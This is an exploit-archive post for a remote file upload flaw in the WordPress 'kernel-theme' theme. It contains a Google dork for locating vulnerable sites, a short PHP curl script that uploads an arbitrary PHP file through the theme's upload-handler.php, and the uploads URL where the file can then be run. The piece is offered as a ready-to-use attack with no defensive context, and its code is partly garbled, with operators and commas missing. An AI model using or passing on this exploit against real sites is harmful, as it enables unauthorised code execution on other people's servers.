facebook facebook twitter rss

WordPress themekernel-theme Themes Remote File Upload Vulnerability

Author: Mr.Black Ghost Dz , Published: 13-06-2014
 #####
# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
# Author: Mr.Black Ghost Dz
# Date: 13/06/2014
# Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077
# Google dork: inurl:/wp-content/themes/kernel-theme/
# Tested on : Windows/Linux
# Contact: www.facebook.com/Algeria.Anon
#####

# Exploit


<?php
$uploadfile
="upload.php";
$ch curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'orange_themes'=>"@$uploadfile")); curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch); print "$postResult";
?>


http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php




Greetz : Anonymous Dz Mmbers

Like us on Facebook :